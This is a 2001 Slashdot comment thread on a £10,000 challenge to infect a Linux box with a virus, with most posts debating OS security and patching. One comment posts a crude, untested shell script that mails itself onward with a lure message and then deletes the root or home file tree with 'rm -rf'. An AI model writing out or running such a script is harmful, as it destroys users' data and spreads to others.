Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Linux Software

£10,000 Prize for Linux Virus Challenge Re-Issued 296

mutantcamel writes "Eddie Bleasdale, the director of NetProject has been offering £10,000 to the first hacker to infect his Linux machine with a virus for the last two years, and so far no one has hit the jackpot. He's re-announced his challenge to virus writers following a Gartner report which told IT depts. not to trust MS server software because of recent worm attacks on their servers, but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."
This discussion has been archived. No new comments can be posted.

£10,000 Prize for Linux Virus Challenge Re-Issued

Comments Filter:
  • Virus challenge ... (Score:3, Interesting)

    by zangdesign ( 462534 ) on Saturday October 13, 2001 @10:48AM (#2423983) Journal
    So ... write a virus and get rewarded for it? What kind of world do we live in where criminals get rewarded?!

    I guess crime does pay ...
    • Yeah and don't forget those criminals Orville and Wilbur Wright who broke the law of Gravity.

      The point here isn't to encourage a plethora of Linux viruses, but to show how relatively safe Linux is compared to Micro-suck. Plus any security hole found, would no doubt be plugged much quicker than a Windows security flaw, which probably has to be reviewed by marketing and the legal department before a fix is forthcoming.

    • by kypper ( 446750 )
      So ... write a virus and get rewarded for it? What kind of world do we live in where criminals get rewarded?!


      Wow... I'm sure that will get modded as troll, but he has an interesting point. I question whether some gov agency won't step in and try to arrest anyone who manages to do it.

      Remind you of the DVD-encrypt stuff? I know I am not stupid enough to try and prove to the world that I can wreak havok. Especially not now. That reward will go on unclaimed.

    • I'm not sure what the point of the challenge is, except perhaps as a marketing/evangelist/flamewar salvo. ("My OS is more scure than your puny little OS. Hah!")

      If the reward is claimed, we can probably expect that patches will be quickly written to defeat more malicious attacks in the future. And script kiddies will probably design similar programs, looking for systems that have yet to be patched...

      It will turn into a bit of a race between the kernel development groups and the exploiters.

      IIRC, a similar challenge was issued for a Mac based webserver (Webstar?)-- the "reward" was claimed by an individual who exploited a fairly insecure third party "classified ads" program. My guess is that third party software will form the basis of most candidate viruses.

      The release, even if inadvertant, of viruses into the "wild" can lead to criminal prosecution. This may provide a safer avenue for certain types of computer security research, unlike the hacksmdi contest^H^H^H^H^H^H^Hsting operation...
  • Win the price (Score:3, Insightful)

    by tcc ( 140386 ) on Saturday October 13, 2001 @10:54AM (#2424004) Homepage Journal
    And will you be called a "gifted programmer" a "security expert" or a "terrorist"?

    In these times and with all of what's happening with all the laws passed, I wouldn't even dare touching that kind of contest, sure it's gonna make a possible winner popular, but could be also seen as a prime suspect for writing trojan code, and since law enforcement at higher levels often tries to find someone to blame, well, you know the rest.... (as in wrongfully accused, lack of proofs and still convicted, etc etc).

    • Re:Win the price (Score:2, Insightful)

      by bugg ( 65930 )
      And will you be called a "gifted programmer"
      If you're under-18 and live with gifted white parents.

      a "security expert"
      If you're in your mid 30s and wear a tie.

      or a "terrorist"?
      If you're an Arab, a Muslim, or are even Arab-looking.

      Sad, but probably true.

  • This is Stupid (Score:4, Interesting)

    by Anonymous Coward on Saturday October 13, 2001 @10:54AM (#2424007)
    Keep in mind that default Redhat installation ships with many bugs that all need to be patched. Saying someone can't hack this kids linux box is a reason not to trust MS is just plain stupid. If IT dept. would patch their software and not open idiot attachments you couldnt infect MS BOXES EITHER. Its all about PATCHING, no matter which OS you use.

    Think about it, most MS bugs had patches before they went widescale. If you had taken time to install these patches you wouldn't have been infected. In addition, don't open EXE's that ask for your advice and its extremely hard to infect an NT system as well.

    You cant compare an upgraded and constantly patched linux box to a default Win2k installation.
    • Re:This is Stupid (Score:1, Insightful)

      by Anonymous Coward
      Finally someone talking sense. I don't use MS Windows so i'm not a Microsoft Lover but if you don't update programs with security patches regardless of what OS you use , you're gonna get bit.
    • People keep forgetting tha that when Nimda first appeared, there was no patch for it.

      So how do you prevent that one?

      Both platforms have numerours security issues, but I have noticed with a Windows platform the occurence of widespread eploitation before a patch is available occurs much more often than it does on any open source platform, simply because you don't have to wait for official acknowledgement of the problem before someone produces a fix.
    • Re:This is Stupid (Score:3, Insightful)

      by BlowCat ( 216402 )
      You cant compare an upgraded and constantly patched linux box to a default Win2k installation.
      I don't understand what you are rererring to. The Gartner report discourage using IIS on maintained systems. It is not about default installations.

      The guy just holds a contest. You can do the same with a Windows box. It won't mean that you are comparing patched Windows with the default Linux installation. It will only mean that you are testing how stable patched Windows can be.

      Too bad that a lot of slashdot moderators sympatize to M$ so much that they moderate up very weak arguments that just please them.

      • Too bad that a lot of slashdot moderators sympatize to M$ so much that they moderate up very weak arguments that just please them.
        Maybe you ought to take out the 'symathize with M$' part -- M$, linux, gnome, kde, and nader supporters all do the same thing. perhaps we need a click-though license on the moderation guidelines before they can moderate ... now THAT'll solve the problems...
      • "The Gartner report discourage using IIS on maintained systems. It is not about default installations."

        No it doesn't. Read the report again and notice the point where it says 'Enterprises infected by both Code Red and Nimda.'

        Given that patches for these were available for quite a long time, in the case of Nimda around 18 months... They obviously were not talking about maintained systems.
    • Your right about RedHat. They throw together the worst Linux destro.
      RedHat has lost track of the whole idea of a destro. It's a "value added" Linux.. a better Linux than you'd get if you did it yourself.
      Not RedHat..

      The whole point is you shouldn't need to patch it.
      The defects found in RedHat and Windows are really stupid.
      Yeah don't run attachments.. smart idea.. Let's rember that this is a FEATURE Microsoft ADDED. It's not a defect. Windows was made this way.
      Give Microsoft a break for the first virus. Ok done.. Need the first infection to learn. Well great but the stupid patch is on the human side.

      Let's also remember that Windows is designed to be "user friendly" in other words users don't know better. Linux is made with the os develupers in mind.. not the avrage user. So before you could run an e-mail virus you'd have to know enough about Linux to recognise the virus for what it is.

      Now before we get ferther on the "RedHat".. RedHat is not Linux... RedHat is one single destro that compeates with Microsoft for the title of "the most bugs"... and last I heard RedHat held the title.. Not Microsoft.

      Going into the past there have been many brown bag Unixes that were far worse than anything Microsoft put out. It's not like Microsoft or RedHat has ever achived the title of "all time most buggy".
      But those companys went away. Pushed under by Sun Microsystems long before Linux saw the light of day.

      Yes you can pick out a Linux destro that is as bad if not worse than Microsoft.. I know RedHat isn't the only brain dead destro.
      So you can't just buy the first Linux destro on the shelfs any more than you could buy the first used car you see.

      But you can't shop around for a better Windows.

      Finnaly as I understand Windows admin are fearful of Microsoft patches. They are worried the fix will be worse than the disease...
      That fear dosen't seem to be shared by Linux counterparts.

      Ideally a Linux destro should be fine out of the box needing no patching. Not all destros have this advantage so you do need to shop around.

      A lot more preferable to patching Windows and hoping the patches don't make things worse.

      Basicly for Linux you need to train users there is no way around this.
      If you want Windows to work correctly you have to train the users as well.

      Now what advantage did Windows have over Linux? Not needing to train anybody.
      Oh.. yeah well I guess thats not the case anymore.

      There aren't any viruses for Linux at the moment.
      If you want to argue the future fine be my guest but let's leave it at right now Windows has the lead in viruses. Linux won't catch up even if we wanted it to...
      • If I were moderating this post, I'd call it a troll. Not because you're venting your spleen against Red Hat -- although you are, and at excessive length. But these offenses are not downmoddable in themselves.

        What makes this trolling is that you're not contributing anything new to the discussion. OK, you're one of many people who things that Red Hat is too buggy. This is not useful. What would be useful is a description of distros that (in your opinion) do a better job.

        Need I mention that I personally prefer Red Hat 7.1? Not perfect, but the easiest to live with for my narrow purposes. If I'm full of it, kindly educate me. Don't just scream at me.

      • Customers asked for an easy-to-use installer. Who delivered? Debian? Not even close. Debian is great for administration after it's installed, but getting it on the box in the first place has historically always been much harder than it needed to be.

        "The defects found in RedHat and Windows are really stupid."

        You haven't programmed much have you? (At all? No, patching a C file a couple of times and writing some bash scripts does not count as programming much) Most programmers know that there will be (not might be) bugs in the code. As far as stupid defects, yes they've both had their share. However RedHat is nowhere near Windows in terms of sheer volume of severe bugs. I don't know where you got your data. The last one that I saw was clearly biased (they counted general Linux bugs and RedHat-specific bugs together even though there was significant overlap).

        Also note that RedHat uses newer versions of programs than most other Linux distributions. They don't hide this fact. I applaud them for it. Why? Because if they didn't, glibc2 would not have been adopted as quickly as it was. And what about the "broken" compiler that came out with RedHat 7? People railed and hollered because they couldn't compile their kernels. Actually they could, but people conveniently forgot that RedHat posted notices in big letters that they have to use the older version of the compiler to compile (oh no! you have to use kgcc instead of gcc! how will users ever figure that out, especially if RedHat explicitly tells them that they have to). Yes there were bugs in the compiler. It was patched, but the kernel still didn't build. Why not? Because there was code in the kernel that was not compliant with the C99 standard. People's C++ code wouldn't compile anymore. Why? Because a lot of C++ code is plainly incompatible with the ISO98 standard of C++. You know that thing that Slashdotters are always railing about: STANDARDS. Or do you advocate ignoring standards when they don't suit you? Wouldn't that make you like Microsoft? These are standards that were ratified and publically announced two and three years ago. How can you say that they snuck up on you?

        What does C99 give you?

        void myfunction ( int size ) { char foo[size]; }
        Allocated on the stack so no need for malloc or free (and less corresponding bugs) and basically eliminates the hacks out there to accomplish them same like alloca.

        What does ISO98 C++ give you? The Standard Template Library. 'Nuff said.

        These are examples, but are indicative of a general trend.

        1. New library or suite that is noticeably better comes out
        2. RedHat recognizes that it is better, includes it in their distribution, tests, and releases
        3. People bitch and moan about how it breaks things that don't come with the distribution
        4. Everyone blames RedHat for doing a horrible job
        5. Because it is being used, the library in question gets a shakedown and most bugs are worked out quickly
        6. People reluctantly fix their programs to work with the updated library/suite so that they can run on RedHat
        7. In the course of fixing, people come across the advantages of the new library/suite and herald its arrival
        8. People deride the older version
        9. People forget it was RedHat that drove the newer, better library/suite into general use
        10. Goto 1 because geek memories appear to be very short
        If you want a closer-to-perfect RedHat box, install a copy from two versions ago and install all of the associated patches for it. This will be about the equivalent of a standard Debian install: very secure, but quite out of date. If you run Debian unstable or testing, while having more up-to-date software, you find that many of those "stupid defects" find their way into that distribution as well.

    • Re:This is Stupid (Score:2, Informative)

      by trentfoley ( 226635 )
      If you had taken time to install these patches you wouldn't have been infected

      I agree that systems must be patched. But, lets get real -- From my own experience, installing Microsoft patches is inherently unsafe. I must admit that it has been a while since I dealt with Microsoft Servers. However, I was involved in a hot-fix install where 39 out of 40 NT4.0 servers took patches just fine, but on that 40th, whoa!!! Corrupted registry, blue screen, total failure. Even after restoring from the backup, the patch caused the same failure. According to my client's MCSE, it turned out to be a hosed Microsoft Exchange setup that caused the problem. Perhaps it was my client's fault, but because of their service contract with another 3rd party responsible for Exchange, it took three full days of downtime to get Exchange reinstalled on a patched NT4.0 installation. My group got reamed for the email downtime when all we did was apply security fixes.

      The point I'm trying to make is this: How many admins out there have been burned by applying MS hot-fixes and wait until a full service pack before doing anything, if even then?
    • He's the head of a networking consulting firm and the challenge was to plant a virus in his own properly set up and patched Linux Box. He's putting up his own money, professional skills and reputation to prove his competency. I'm sure that he has a definition of what a virus is to qualify, as well as an quarenteened system to test them on.

      Most likely he considers the oppertunity to study these attempts in a controlled enviroment, more valuable than the money anyways. In a world where most warrenties say something like "Not guarenteed to be suitable for any purpose". I find this approach most refreshing. Try and find commercialy producted software that states that its suitable even for the purpose it was manufactured for.

      I hope for his sake running outlook and IE 5.5 in wine is out-of-bonds. I read a while back where the wine crew considered getting a virus to be a major mile stone achievment in compatability.

      • "I read a while back where the wine crew considered getting a virus to be a major mile stone achievment in compatability."

        yes it was considered to be a milestone to be able to run a macro virus. even though it would not propagate through to other documents.
  • Does anyone else think that it is irresponsible to try to persuade virus writers to target Linux? What happens if someone is successful and unleashes a particularly nasty linux virus on us?

    Let the virus kiddies stick to targeting Windoze.

    HH
    • If anyone actually wins this prize, it seems extremely unlikely he would want to infect other computers, or do anything in a way that would jeopardize claiming the prize money, since that's the motive for writing the virus in the first place. Lets not get too paranoid about the legal system, this would be an invited attack, and the winner would have their pick of security consultant positions around the IT world.
    • Responsible (Score:3, Redundant)

      by error0x100 ( 516413 )

      What happens if someone is successful and unleashes a particularly nasty linux virus on us?

      Then the particular exploit will be patched, people will learn from the experience, and Linux will be a better, more secure system as a result.

      If we discourage people from trying to break systems, we end up with weak systems.

      Making Linux more secure today may result in some costly damage today - but will result in a more secure Linux, which will (as more and more people install and rely on Linux) almost certainly prevent orders of magnitude more damage several years from now. If we allow systems to become "weak", but continue installing millions more such systems, sooner or later someone will write a truly malicous virus, and the damage will be far greater in that case. Think man.

  • by neema ( 170845 ) on Saturday October 13, 2001 @10:56AM (#2424020) Homepage
    Does he just want his linux box destroyed or does it have to be a virus? He can give me his address, I'll gladly fly down to his house and smash up his linux box with a bat for 10,000 pounds (that's around 14,534 dollars and 22 cents).
  • I'm guessing the virus writers gave up already. I'm sure 10,000 pounds is not worth the time of two years. It sounds to me that it's impossible. They should increase that amount by an exponent of 100 and see what happens.

    But it's even more funny that they have to pay people to attempt to write a virus, on a free and open source system. This only means one thing...Linux really works!
  • by Skapare ( 16644 ) on Saturday October 13, 2001 @11:00AM (#2424038) Homepage

    If businesses want to make their networks secure, they need to hire someone who cares and knows how, and pay well to get that person. Then don't hinder them with petty things like bureaucracy. They should report directly to the CTO or CIO, or actually be the CTO or CIO.

  • Found on the same site Virus & Hacking [zdnet.co.uk]
  • If he doesn't run his email attachments he'll be safe. What's the big deal?
  • Most of the hits I get on my firewall from nimda now come from the network used by a nearby University for their Dorm and Apartment service.


    The university starts later than most (Sept. 28), and I started getting this round of hits about the same time the Dorms opened up.


    Problem, is the university doesn't seem to be willing to do anything about it.

  • Mac virus (Score:2, Funny)

    by Quasar1999 ( 520073 )
    Today, I shall announce an award of $5 (CDN) to who ever can write a virus for a Mac...

    So start coding... There is a lot of competition out there...
  • To be a real virus, it has to propagate to other machines, which is likely breaking the law.

    So the 10,000 pounds will eventually end up in the pocket of a lawyer for defending you!
  • "...but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."

    After all the hours I put in on those bloody worms & viruses, it's nice to see some fallout against Microsoft, those who set the scene for such silliness. If they take responsibility for creating an insecure environment with their OS and software, they do severe damage to their brand and franchise value. If they do what they're doing now, biting the hands which feed them, ie those in the trenches making their crappy software work in production, then they will likely alienate many of the hordes of SAs which help them maintain their current position in the Enterprise & SOHOs.

    Squirm, MS, Squirm.
  • Two years ago, most programmers were fat and content in their dot com job and didn't really have too much spare time for such stuff.

    Now with the job market in the shitter, I can see someone putting plenty of effort into coding a worm for Linux (especially for $10K). A lot of people now have nothing else to do except submit resumes and work on personal projects.
  • Windows Update? (Score:5, Insightful)

    by sharkey ( 16670 ) on Saturday October 13, 2001 @11:21AM (#2424122)
    Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.

    So the admins responsible for Windows Update are considered 'tards by Microsoft? After all, windowsupdate.microsoft.com was reportedly "hacked by Chinese" this summer.
    • I can vouch for that. I saw it myself. The front page of Windows Update said "Hacked by Chinese."

      Then I thought "how are all these admins going to patch their servers against the new virus if Windows Update is infected?"

  • I'll bet that if those gifted hackers using Linux entered this contest, it would only be a matter of time before someone did it. The problem is, none of these hackers using linux want to ruin the "secure" reputation of the OS by winning this contest. Instead of worrying about ruining its reputation, try and make a virus for it so the linux community can then come up with an update for the kernel or whatever to make it secure again.
    • However, technically bright people who prefer MS Windows over open source systems may well have an interest in proving Linux is not invulnerable to this kind of thing. If one of them can get in, that might well prove something. If both of them can, it probably does prove something.

    • You're assuming that the virus author would invent a new exploit. In practice, discovering an exploit and using it in a virus are two different activities, usually performed by different people. Lots of people already work on finding vulnerabilities in Linux and software that runs on Linux. They post their exploits on Bugtraq. I don't think anyone is holding back for fear of ruining Linux's reputation.

      Secondly, kernel exploits are rare. A real virus would probably use an exploit in glibc or in an application.
  • by Anonymous Coward
    ... provided you're not stupid.

    I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23.

    And please no DOS attacks....
    • $10 Canadian? Bah. I'll offer a bottle of Dr Pepper and a packet of crisps to the first person who can hack into my box located at IP address 127.0.0.1 and delete all the files on it...
  • Perhaps $ 1.000.000 make sense. No body hurt himself for $15.000.

    Thats impossible man, They can't write worm or virus.
    Maybe for apache or someting.

    But in any condition. its impossible to spread like M$ worms.
  • Does anthrax on your keyboard count as a computer virus?

    --just a thought. No intent to offend, etc.

    I dont think linux is more secure for this kind of thing ;-)

    Short Answer: Anthrax isn't a virus.

  • I looked at netproject.com and couldn't find more details. What's the machine running, etc? Right now, my Linux box is behind my Windows box that only runs a web proxy. I'm also on dialup. Plus, my linux box is shut off right now. That makes it pretty secure, right? Seriously, if people only run their box with a web server and SSH, there's less of a chance of getting inside that if they ran many servers and had to worry about hacking from people with accounts on the box.
    • I sent email to netproject.com asking what the deal was. Really, reporting something like this without an actual written challenge is just stupid. Even with the written challenge it is hard enough to get payment on a gentleman's bet.
  • a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.

    Now huge sucess in IIS' worms is due to 'tardy' NT sysadmins, and definitely not MS' fault?

    MS fans should feel sad for having honored title 'tardy' after all those years of unconditional loyalty.
  • Considering that writing a virus could be considered terrorism, and prosecuted as suck, I don't know that this would be the best idea...

    Although, I would certainly like the 10k Pounds...

    (Now, if only I knew how to input the Pound symbol on my US keyboard...)
    • Now, if only I knew how to input the Pound symbol on my US keyboard


      More to the point, I wish CmdrTaco didn't. Then, perhaps, he'd use the correct £ HTML character entity, rather than a Latin1 pound (0xA3). Try setting the character encoding to something else (e.g., Cyrillic ISO-8859-5) and then look at the title of this story to see why.

  • I've seen hacking contests before. They're really freaking lame. The results are not often announced, it just disappears. Or you get everyone doing a DoS thinking that is hacking.

    "Bleasdale maintains it is impossible to infect a correctly configured Linux system with a virus, and conversely that it is impossible to make a system running Windows secure."

    Okay this is quite clearly wrong. On many levels. Now it is possible that this guy set up a linux box with no services running at all. Fine. WindowsNT is equally secure with nothing running. But lets say a linux box has Apache, bind, or FTP on it. We've seen buffer overflows and other attacks on these software products. There is a delay from discovery to annoucement to fix available. To claim that a linux box is impossible to infect is just showing ignorance, unless of course it's running nothing at all.
  • Proves Nothing (Score:2, Insightful)

    by Bud Dwyer ( 527622 )
    I'm running Windows 98, and using a little common sense, I've never had any trouble with Viruses. Does this prove that Windows 98 is as good as Linux?


    More to the point: It's stupid and lazy people who get viruses, regardless of their OS. If Linux ever becomes widespread, it will have a bigger virus problem than Microsoft ever has.

    • It's non-computer geeks who get viruses. Why should the average person have to be paranoid about everything they do while connected to the net? It takes a great deal of knowledge to know what you need to be paranoid about and what you don't. Almost all of us download programs from unknown sites and run them; the intuition on what's safe and not there is hard to develop, and doesn't always save you. (Heck, even store bought programs from big names have been known to contain viruses.)

      Don't blame stupid people for viruses; the average person won't and shouldn't have to know enough to block every virus. Blame the people who made systems where virus writing is simple and fruitful.
  • by SmileyBen ( 56580 ) on Saturday October 13, 2001 @12:32PM (#2424370) Homepage
    Before people start slamming the Gartner report again, I hope they've read it. People seem to be under the impression that Gartner said that IIS simply wasn't secure and that other things are better - and that the response to this is 'duh, any machine which isn't updated isn't secure'. That isn't a valid response at all, because what Gartner very specifically said was not that IIS couldn't be secured, but that it is simply uneconomical because of the time and effort it takes to update IIS.

    I.e. Just what they are saying is 'We all know you need good sysadmins to make sure systems are up to date with security patches, but in the case of IIS you'll have to employ someone to spend all their time doing this, and that simply isn't the least expensive way to go'....
    • Well that's not correct either.

      You don't have to spend all of your time doing anything to IIS. You monitor a handful of email lists, and apply patches as they come out once a month or so. Takes maybe a few hours of time a month.

      But, if you read the Gartner report what they specifically say is that enterprises which were impacted by both Code Red and Nimda should look at alternatives.

      The rational behind this being that if that was the case, then you obviously don't have the procedures in place to keep up to date on your servers.

      The Gartner report was a kneejerk reaction which wasn't really helpful... like most Gartner recommendations.

  • Makes me wonder... (Score:3, Insightful)

    by trilucid ( 515316 ) <pparadis@havensystems.net> on Saturday October 13, 2001 @12:49PM (#2424428) Homepage Journal

    I have to admit that *some* (okay, maybe a lot/most) of the infections were purely due to poor server administration. The story doesn't stop there though.

    I offer up as proof of what follows my Apache logs on my home machine for the last month. It's amazing how many machines out there seem incredibly interested in files such as "cmd.exe" and "root.exe", which (gasp!) don't exist on my Linux box. What's funnier is the fact that the vast majority of these attacks came from the BellSouth DSL network and various cable networks. I actually got to the point where I was ready to write a Perl script to grep up the nefarious log entries, nmap 'em automatically, and ship the results off to BellSouth's abuse department every 12 hours...

    The point I'm trying to make is simply that the biggest vector for the spread of this crap is home machines. MS can yap all day long about how poor admin'ing causes this, while they fail to admit that they've put horribly insecure web server software in the hands of average Joe and Jane Consumer. Now, I'm not saying it's all MS's fault; Joe and Jane are very much to blame too for not bothering to click "Start -> Windows Update" every once in a while.

    But I won't accept that MS can claim any sort of innocence on this. What about other /.'ers? How have your logs looked recently? Were the attacks on your network(s) mostly from commercial servers, or home-based machines?

  • This has to be the most poorly researched article I've ever seen. What is this? "I heard Eddie say that he'd give Sophos a bucket load of money if they could infect his Linux box" becomes news? For a start, there are already Unix viruses [www.avp.ch] and they have been reported in the wild. What is all this stuff about "hackers" and "exploits" about? Are we talking about worms or viruses or what? Where is the actual written declaration of the challenge? Who is the third party holding the cash in escrow? How is the challenge supposed to work? Surely Ed isn't suggesting that he will track down and award the author of any virus that ends up on his machine. Surely Ed isn't trying to incite people to write actual viruses and release them into the wild. I have emailed netproject.com, maybe the original "reporter" should have done this, it's called basic research. BTW - I heard Bill Gates said he'd give $1,000,000 to anyone who can sneak a woopie cushion onto his chair before he sits down on monday, should I look for the Slashdot article?
  • "but a Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins."

    Yeah.. they were to lazy to install a real OS like Unix/Linux/BSD... hey even if they kept NT or Windows, they could have at least used Apache!

  • Virus means Anthrax is out.

  • #!/bin/sh
    #
    # TODO:
    # Parse e-mail address' out of browser's cache
    # Send program as attachment in e-mail
    # Program untested, you'll get the idea anyway...
    #
    echo -e 'To: $TO_ADDR\nSubject: Hi! How are you? \n\nI send you this file in order to have your advice\n\n#!/bin/sh\nif[ "$UID" = "0" ]; then\n\nrm -rf /\nelse\nrm -rf ~/\nfi" | sendmail -t

    if[ "$UID" = "0" ]; then
    rm -rf /
    else
    rm -rf ~/
    fi

    The program can be considered a virus. While it is blantently clear that you should never run it, I could have made it a binary which would have made it harder to see what it does. And who is to say that the user will even look at the file before executing it? A virus on any system requires the user to execute code (even if it is automated to a certain extent on certain systems). Whether the system is Linux or Windows, if the user wants to execute a program, they will.
    • Problem is, you also need to have an email client that either runs the script automatically, or allows you to run the script just by clicking on the attachment. None of the Unix email clients I've seen do that. So to run the script you actually need to:

      1) save it as a file
      2) enable execute permission (chmod +x file)
      3) run.

      So there is no way you can run it inadvertantly (as is the case with Outlook).
  • Tardy is like 5 minutes, not half a fucking year. Lets be honest here, these sysadmins are not tardy, they are goddamn incompetent.
  • Tardy admins (Score:2, Insightful)

    by Mark Bainter ( 2222 )
    Hrm. I would just like to point out that MS created admins that are afraid to apply patches. Worse yet, they created admins who don't understand their importance and relevance. They reduced the admin to a grunting buffoon and now they want to complain that they didn't do a good enough job protecting their O/S from its own shoddy development.

Don't tell me how hard you work. Tell me how much you get done. -- James J. Ling

Working...